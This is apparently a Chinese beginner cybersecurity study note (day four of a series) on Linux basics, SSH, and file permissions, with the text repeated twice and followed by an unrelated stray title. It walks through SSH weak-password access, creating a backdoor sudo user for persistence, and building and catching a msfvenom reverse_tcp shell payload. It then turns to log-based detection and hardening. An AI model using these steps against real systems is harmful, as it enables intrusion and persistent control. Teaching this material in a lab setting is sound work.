)
一、学习Linux操作系统一初学Linux操作系统Linux 发行版是将Linux 内核、开源软件如 Shell、编译器、桌面环境、应用程序及系统工具整合打包并提供安装、更新、维护机制的完整可直接使用的操作系统套件。1、基于Debian的发行版DebianUbuntuLinux MintPop!_OSElementary OSZorin OSKubuntu/Xubuntu/Lubuntu官方衍生版Kali Linux专注于安全MX LinuxDeepin中国发行版2、基于Red Hat的发行版Red Hat Enterprise Linux (RHEL)CentOS原版已转向Stream传统分支由社区维护Fedora上游项目Nobara Linux游戏优化版AlmaLinuxRHEL兼容版Rocky LinuxRHEL替代3、Linux服务器1和个人电脑相比作为服务器需要7×24 小时不间断稳定运行、支撑多用户高并发访问同时要具备强安全性、灵活可扩展性和低运维成本。2Linux 的优势开源与免费Linux 是开源操作系统用户可以自由修改和分发代码。大多数发行版免费适合预算有限的个人或企业。高定制性用户可根据需求自定义系统组件从内核到桌面环境均可调整适合开发者和高级用户。稳定性与安全性Linux 系统崩溃率低适合长期运行。开源特性使得漏洞能快速修复恶意软件较少。资源占用低对硬件要求较低适合老旧设备或嵌入式系统服务器领域表现尤为突出。强大的命令行工具提供丰富的命令行工具和脚本支持自动化任务和管理系统效率极高。多用户支持原生支持多用户环境权限管理严格适合团队协作或服务器场景。3Windows 的优势广泛的软件兼容性支持大量商业软件和游戏生态成熟用户无需频繁寻找替代品。用户友好性图形界面直观适合普通用户快速上手硬件驱动支持完善即插即用体验好。企业集成深度集成各类服务适合企业级 IT 管理和办公环境。硬件支持广泛厂商普遍优先适配 Windows新硬件如显卡、外设兼容性更好。游戏与多媒体DirectX 技术支持主流游戏多媒体创作工具优化更佳。专业软件支持行业专用软件通常优先推出 Windows 版本。4、Linux目录结构二Linux系统服务安全1、SSH服务SSH 类似 Windows 的 RDP以命令行为主RDP 以图形化桌面为主实现 “远程如同本地操作” 的效果。远程控制2、SSH系统服务漏洞复现1服务器是大多是公司的不可能干什么都带着操作什么都直接使用服务器的主机进行一般都是一个部门或多个部门负责远程控制进入服务器桌面这就需要打开SSH服务就会给别有用心的人可乘之机。2配置环境·安装SSH服务安装SSH服务 apt install openssh-server·配置允许root用户远程密码登陆vim /etc/ssh/sshd_config•PermitRootLogin yes•PasswordAuthentication yes·重启SSH服务service ssh restart3目标通过信息收集获得IP地址等信息再通过弱口令或暴力破解获得密码4通过windows终端命令远程控制Linux服务器·ssh root192.168.1.105(目标ip)·再输入密码5通过kali命令远程控制Linux服务器·ssh root192.168.1.105(目标ip)·再输入密码(6)通过第三方工具进行远程控制Linux服务器·FinalShellWindows 国产SSHSFTP 一体化•新建连接填入 Linux IP、22 端口、账号密码•左侧文件树直接拖拽上传下载文件自带终端。·Xshell Xftp•Xshell远程命令终端Xftp文件传输。·SecureCRT、Putty•老牌 SSH 客户端仅终端操作。7远程控制之后为了持久化控制进行创建后门·新建用户useradd -m【用户名】·设置密码passwd【用户名】·临时以root权限执行指令sudo【具体命令】·配置sudo权限: vim /etc/sudoers 增加【用户名】 ALL(ALL:ALL) ALL·设置用户root权限vim /etc/passwd3、Linux文件权限·ls列出当前目录下文件·ll或ls -l列出当前目录下文件详细·第1位d代表目录文件夹 -代表普通文件 l代表软链接 b代表块设备·c表示字符设备 s表示socket p代表管道·第2-4位rwx 表示当前用户具有可读可写可执行的权限 r 读 w 写 x执行如果哪一位是- 就是代表哪一位没有权限·第5-7位r-x 表示当前组具有可读、不可写、可执行的权限 r 读 w 写 x执行如果哪一位是- 就是代表哪一位没有权限·第8-10位r-x 表示其他用户具有可读、不可写、可执行的权限 r 读 w 写 x执行如果哪一位是- 就是代表哪一位没有权限·数字2后面的kali代表文件所属用户再后面的代表用户所属组·再后面的是大小、日期、文件名4、Linux权限管理1更改文件所有者 chown 用户:用户组 test2修改文件权限r代表数字4、w代表数字2、x代表数字1·chmod 755 文件名 把文件的权限修改成rwxr-xr-x当前用户权限7 当前组5其他用户5·chmod urwx,grx,orx 文件名 把文件的权限修改成rwxr-xr-x当前用户权限7 当前组5其他用户5u表示当前用户g当前组o其他用户·chmod x 文件名 用户、组、其他人权限都加x·chmod ux 文件名 (用户权限加x)·chmod g-x 文件名(当前组权限取消x)三Linux木马入侵检测1、木马和肉鸡木马是伪装成合法软件、隐蔽运行在目标设备中用于长期控制设备或窃取数据的恶意程序。肉鸡是被黑客通过木马等恶意程序秘密控制的设备。2、攻击流程复现1制作木马通过msf框架使用kali自带的msf框架msfvenom-plinux/x64/shell/reverse_tcpLHOST攻击机ip(Kali)LPORT9999-felf-oshell.elf2植入木马通过自身方式让对方得到木马并执行木马3启动木马·msfconsole·useexploit/multi/handler·setpayload linux/x64/shell/reverse_tcp·setlhost 攻击机ip(Kali)·setlport 9999·run四Linux安全防护及加固1、Linux检测之系统日志1系统日志记录启动、服务、错误信息 cat /var/log/syslog2登录日志查看异常登录比如陌生IP登录 cat /var/log/auth.log2、Linux系统日志排查1查看当天所有日志可能需要管理员权限sudo journalctl2查看特定服务的日志例如ssh服务sudo journalctl -u ssh3查看特定时间段的日志sudo journalctl --since 2024-06-20 18:00:00 --until 2024-06-20 20:00:004查看ssh的日志sudo journalctl -u ssh | grep Failed password | tailsudo journalctl -u ssh | grep Accepted password | tail3、安装第三方审计工具4、Linux可疑账户排查5、分析可疑进程6、Linux系统加固之账户加固7、防火墙加固
如何从一名小白成为网安大神(第四天)
发布时间:2026/6/3 1:32:43
一、学习Linux操作系统一初学Linux操作系统Linux 发行版是将Linux 内核、开源软件如 Shell、编译器、桌面环境、应用程序及系统工具整合打包并提供安装、更新、维护机制的完整可直接使用的操作系统套件。1、基于Debian的发行版DebianUbuntuLinux MintPop!_OSElementary OSZorin OSKubuntu/Xubuntu/Lubuntu官方衍生版Kali Linux专注于安全MX LinuxDeepin中国发行版2、基于Red Hat的发行版Red Hat Enterprise Linux (RHEL)CentOS原版已转向Stream传统分支由社区维护Fedora上游项目Nobara Linux游戏优化版AlmaLinuxRHEL兼容版Rocky LinuxRHEL替代3、Linux服务器1和个人电脑相比作为服务器需要7×24 小时不间断稳定运行、支撑多用户高并发访问同时要具备强安全性、灵活可扩展性和低运维成本。2Linux 的优势开源与免费Linux 是开源操作系统用户可以自由修改和分发代码。大多数发行版免费适合预算有限的个人或企业。高定制性用户可根据需求自定义系统组件从内核到桌面环境均可调整适合开发者和高级用户。稳定性与安全性Linux 系统崩溃率低适合长期运行。开源特性使得漏洞能快速修复恶意软件较少。资源占用低对硬件要求较低适合老旧设备或嵌入式系统服务器领域表现尤为突出。强大的命令行工具提供丰富的命令行工具和脚本支持自动化任务和管理系统效率极高。多用户支持原生支持多用户环境权限管理严格适合团队协作或服务器场景。3Windows 的优势广泛的软件兼容性支持大量商业软件和游戏生态成熟用户无需频繁寻找替代品。用户友好性图形界面直观适合普通用户快速上手硬件驱动支持完善即插即用体验好。企业集成深度集成各类服务适合企业级 IT 管理和办公环境。硬件支持广泛厂商普遍优先适配 Windows新硬件如显卡、外设兼容性更好。游戏与多媒体DirectX 技术支持主流游戏多媒体创作工具优化更佳。专业软件支持行业专用软件通常优先推出 Windows 版本。4、Linux目录结构二Linux系统服务安全1、SSH服务SSH 类似 Windows 的 RDP以命令行为主RDP 以图形化桌面为主实现 “远程如同本地操作” 的效果。远程控制2、SSH系统服务漏洞复现1服务器是大多是公司的不可能干什么都带着操作什么都直接使用服务器的主机进行一般都是一个部门或多个部门负责远程控制进入服务器桌面这就需要打开SSH服务就会给别有用心的人可乘之机。2配置环境·安装SSH服务安装SSH服务 apt install openssh-server·配置允许root用户远程密码登陆vim /etc/ssh/sshd_config•PermitRootLogin yes•PasswordAuthentication yes·重启SSH服务service ssh restart3目标通过信息收集获得IP地址等信息再通过弱口令或暴力破解获得密码4通过windows终端命令远程控制Linux服务器·ssh root192.168.1.105(目标ip)·再输入密码5通过kali命令远程控制Linux服务器·ssh root192.168.1.105(目标ip)·再输入密码(6)通过第三方工具进行远程控制Linux服务器·FinalShellWindows 国产SSHSFTP 一体化•新建连接填入 Linux IP、22 端口、账号密码•左侧文件树直接拖拽上传下载文件自带终端。·Xshell Xftp•Xshell远程命令终端Xftp文件传输。·SecureCRT、Putty•老牌 SSH 客户端仅终端操作。7远程控制之后为了持久化控制进行创建后门·新建用户useradd -m【用户名】·设置密码passwd【用户名】·临时以root权限执行指令sudo【具体命令】·配置sudo权限: vim /etc/sudoers 增加【用户名】 ALL(ALL:ALL) ALL·设置用户root权限vim /etc/passwd3、Linux文件权限·ls列出当前目录下文件·ll或ls -l列出当前目录下文件详细·第1位d代表目录文件夹 -代表普通文件 l代表软链接 b代表块设备·c表示字符设备 s表示socket p代表管道·第2-4位rwx 表示当前用户具有可读可写可执行的权限 r 读 w 写 x执行如果哪一位是- 就是代表哪一位没有权限·第5-7位r-x 表示当前组具有可读、不可写、可执行的权限 r 读 w 写 x执行如果哪一位是- 就是代表哪一位没有权限·第8-10位r-x 表示其他用户具有可读、不可写、可执行的权限 r 读 w 写 x执行如果哪一位是- 就是代表哪一位没有权限·数字2后面的kali代表文件所属用户再后面的代表用户所属组·再后面的是大小、日期、文件名4、Linux权限管理1更改文件所有者 chown 用户:用户组 test2修改文件权限r代表数字4、w代表数字2、x代表数字1·chmod 755 文件名 把文件的权限修改成rwxr-xr-x当前用户权限7 当前组5其他用户5·chmod urwx,grx,orx 文件名 把文件的权限修改成rwxr-xr-x当前用户权限7 当前组5其他用户5u表示当前用户g当前组o其他用户·chmod x 文件名 用户、组、其他人权限都加x·chmod ux 文件名 (用户权限加x)·chmod g-x 文件名(当前组权限取消x)三Linux木马入侵检测1、木马和肉鸡木马是伪装成合法软件、隐蔽运行在目标设备中用于长期控制设备或窃取数据的恶意程序。肉鸡是被黑客通过木马等恶意程序秘密控制的设备。2、攻击流程复现1制作木马通过msf框架使用kali自带的msf框架msfvenom-plinux/x64/shell/reverse_tcpLHOST攻击机ip(Kali)LPORT9999-felf-oshell.elf2植入木马通过自身方式让对方得到木马并执行木马3启动木马·msfconsole·useexploit/multi/handler·setpayload linux/x64/shell/reverse_tcp·setlhost 攻击机ip(Kali)·setlport 9999·run四Linux安全防护及加固1、Linux检测之系统日志1系统日志记录启动、服务、错误信息 cat /var/log/syslog2登录日志查看异常登录比如陌生IP登录 cat /var/log/auth.log2、Linux系统日志排查1查看当天所有日志可能需要管理员权限sudo journalctl2查看特定服务的日志例如ssh服务sudo journalctl -u ssh3查看特定时间段的日志sudo journalctl --since 2024-06-20 18:00:00 --until 2024-06-20 20:00:004查看ssh的日志sudo journalctl -u ssh | grep Failed password | tailsudo journalctl -u ssh | grep Accepted password | tail3、安装第三方审计工具4、Linux可疑账户排查5、分析可疑进程6、Linux系统加固之账户加固7、防火墙加固
:Dispatchers 到底是什么?切线程真的只是切线程吗?)
)
